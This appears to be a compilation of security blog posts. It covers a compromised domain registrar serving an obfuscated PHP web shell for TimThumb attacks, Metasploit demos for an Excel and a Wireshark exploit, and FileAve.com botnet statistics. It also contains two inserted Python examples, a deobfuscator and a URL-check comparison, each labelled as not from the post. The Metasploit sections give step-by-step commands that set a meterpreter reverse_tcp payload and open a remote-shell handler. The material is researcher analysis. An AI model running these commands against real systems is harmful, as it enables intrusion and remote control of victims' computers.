About.US Domain Names Registrar Owned

During some analysis of the WordPress TimThumb botnet, I discovered that a .US domain registrar known as “About.US” is completely compromised, and has been since at least 15 September. Some RFI (Remote File Inclusion) scripts, which exploit the WordPress TimThumb vulnerability, call, in an obfuscated way, a hidden file “stun.jpg” on the “About.US” web site.

This “stun.jpg” file is itself obfuscated and is identified as a PHP shell malware by 3/20 anti-viruses on Jotti, 3/36 on VirusScan and 3/43 on VirusTotal. The obfuscation is applied 10 times with gzinflate(str_rot13(base64_decode())) functions. After deobfuscation, the revealed code is a PHP web shell named “[ STUNSHELL #unknown @ ByroeNet ]”. You can find this PHP web shell with a simple Google dork.
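As an added example (not code from the post or from the sample itself), a small Python deobfuscator that peels the nested gzinflate(str_rot13(base64_decode())) wrappers described above, the way an analyst would unwrap such a file layer by layer. It works on a constructed sample that it builds itself rather than on the real stun.jpg; the wrap_once and build_sample helpers exist only to produce that sample and are assumptions for the demo.

```python
import base64
import re
import zlib
from typing import Optional, Tuple

# Byte-wise ROT13 table equivalent to PHP's str_rot13 (only A-Z and a-z are rotated).
_ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)
# Matches one gzinflate(str_rot13(base64_decode("..."))) wrapper and captures the blob.
WRAPPER = re.compile(
    rb'gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']'
)

def peel_layer(src: bytes) -> Optional[bytes]:
    """Undo one wrapper: base64-decode, un-rot13, then raw-inflate (PHP gzinflate)."""
    m = WRAPPER.search(src)
    if m is None:
        return None
    blob = base64.b64decode(re.sub(rb"\s+", b"", m.group(1)))
    return zlib.decompress(blob.translate(_ROT13), -15)  # -15 = raw DEFLATE, no header

def deobfuscate(src: bytes, max_layers: int = 64) -> Tuple[bytes, int]:
    """Peel wrappers until none is left; return (innermost code, layers removed)."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(src)
        if inner is None:
            break
        src, layers = inner, layers + 1
    return src, layers

def wrap_once(code: bytes) -> bytes:
    """Inverse of peel_layer; used only to build a constructed sample (assumed helper)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode((c.compress(code) + c.flush()).translate(_ROT13))
    return b'eval(gzinflate(str_rot13(base64_decode("' + blob + b'"))));'

def build_sample(inner: bytes, layers: int) -> bytes:
    """Constructed sample: `inner` wrapped `layers` times (the real file used 10)."""
    for _ in range(layers):
        inner = wrap_once(inner)
    return b"<?php " + inner

if __name__ == "__main__":
    sample = build_sample(b'echo "hello";', 3)
    print(deobfuscate(sample))
```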

As you know, exploiting the WordPress TimThumb vulnerability requires some extra technical infrastructure, such as the ability to create domain names or subdomains containing:

  • flickr.com
  • picasa.com
  • blogger.com
  • wordpress.com
  • img.youtube.com
  • upload.wikimedia.org
  • photobucket.com
Isn’t it easy to create such domains or subdomains if you own a domain name registrar!
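Added example (not TimThumb's actual source, and not code from the post): a simplified substring check of the kind the post describes, placed beside a hardened check that only accepts the trusted domain itself or a real subdomain of it. The URLs are constructed for the demo and the ".example" hosts are hypothetical.

```python
from typing import Dict, Tuple
from urllib.parse import urlsplit

# The remote hosts TimThumb trusted, as listed above.
ALLOWED_DOMAINS = [
    "flickr.com", "picasa.com", "blogger.com", "wordpress.com",
    "img.youtube.com", "upload.wikimedia.org", "photobucket.com",
]

def host_of(url: str) -> str:
    """Return the URL's host, lower-cased and without a trailing dot."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")

def allowed_substring(url: str) -> bool:
    """Weak check: accepts any host that merely contains a trusted domain string."""
    host = host_of(url)
    return any(domain in host for domain in ALLOWED_DOMAINS)

def allowed_suffix(url: str) -> bool:
    """Hardened check: host must equal a trusted domain or be a subdomain of it."""
    host = host_of(url)
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)

# Constructed URLs; the ".example" hosts stand in for registrar-created names.
CASES = [
    "http://farm1.flickr.com/pic.jpg",          # genuine subdomain of a trusted host
    "http://img.youtube.com/vi/abc/0.jpg",      # exact trusted host
    "http://www.flickr.com.example/stun.jpg",   # trusted name embedded in another domain
    "http://notflickr.com/x.jpg",               # trusted name as the tail of a label
    "http://wordpress.com.attacker.example/",   # same trick with another trusted name
]

def compare() -> Dict[str, Tuple[bool, bool]]:
    """Map each URL to (substring verdict, suffix verdict)."""
    return {u: (allowed_substring(u), allowed_suffix(u)) for u in CASES}

if __name__ == "__main__":
    for url, (weak, strong) in compare().items():
        print(f"substring={weak!s:5} suffix={strong!s:5} {url}")
```

The last three URLs pass the substring check and fail the suffix check, which is exactly the gap that owning a registrar lets an attacker exploit.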

MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability on 2010-06-08
First exploit provided by abysssec on 2010-09-24
Metasploit PoC provided on 2011-11-21

PoC provided by :

Nicolas Joly
Shahin Ramezany
juan vazquez

Reference(s) :

CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094

Affected version(s) :

Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel and PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Excel 2002 (10.2614.2625) SP0

Description :

This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record, an attacker can take control of the execution flow. This results in arbitrary code execution in the context of the user.

Commands :

use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3360 Wireshark console.lua pre-loading Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC on 2011-07-18
Coordinated release of the vulnerability on 2011-11-15
Metasploit PoC provided on 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This module exploits a vulnerability in Wireshark 1.6 or earlier. When opening a pcap file, Wireshark checks whether a ‘console.lua’ file exists in the same directory, and parses/executes the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

In Memory of FileAve.com Botnet

Good news for everyone: FileAve.com has finally been down since 18 October! In July 2010 I wrote a blog post on FileAve.com, a free file hosting provider notorious for spreading thousands of malware samples. FileAve.com provided 50 MB of free storage and a free subdomain for each created account (e.g. http://yourname.fileave.com). FileAve.com was owned and operated by “Ripside Interactive, Inc.”, located in the US, and more precisely by “Smith, Scott”, since September 2008. “Ripside Interactive, Inc.” was also the owner of ripway.com, another notorious malware hoster.

FileAve.com has been present in the Clean MX database since 2007-11-30, in the Malc0de database since 2010-01-11 and in our database since 2009-02-16.

With the data contained in our Honeynet database, I can provide the following statistics. FileAve.com and its associated subdomains were linked to 94 other malware spreaders, but FileAve.com was the most important malware spreader in this botnet. These 95 malware spreaders were regularly contacted by 1420 other source IP addresses, not known for hosting malware, in order to attempt to infect new potentially vulnerable web servers or computers.

The median lifetime of the 95 malware spreaders was 5 days, with 6 of them having a lifetime above 1 year, and 2 of those 6 a lifetime above 2 years. Of the 1420 other source IP addresses, 754 were directly connected to the FileAve.com IP address.

43 of the malware spreaders were located in South Korea and 32 others in the US. 837 distinct source IP addresses contacted the malware spreaders located in the US and 309 others contacted the malware spreaders located in South Korea.

The hosting country that took the longest time to shut down its malware spreaders is France, with only 2 malware spreaders located in this country but an average lifetime of 184 days. The second country is China, with 2 malware spreaders and an average lifetime of 164 days. The third country is Thailand, with 2 malware spreaders and an average lifetime of 127 days. The fourth country is South Korea, with 43 malware spreaders and an average lifetime of 105 days.

The FileAve.com botnet's golden age was between March 2010 and September 2010, with the highest ratio of active malware spreaders, the most source IP addresses and the most generated events.

If you are interested in more statistics about FileAve.com activities, I have written a PDF, available here. I have also created a geographic time map of all activities generated by the FileAve.com botnet.
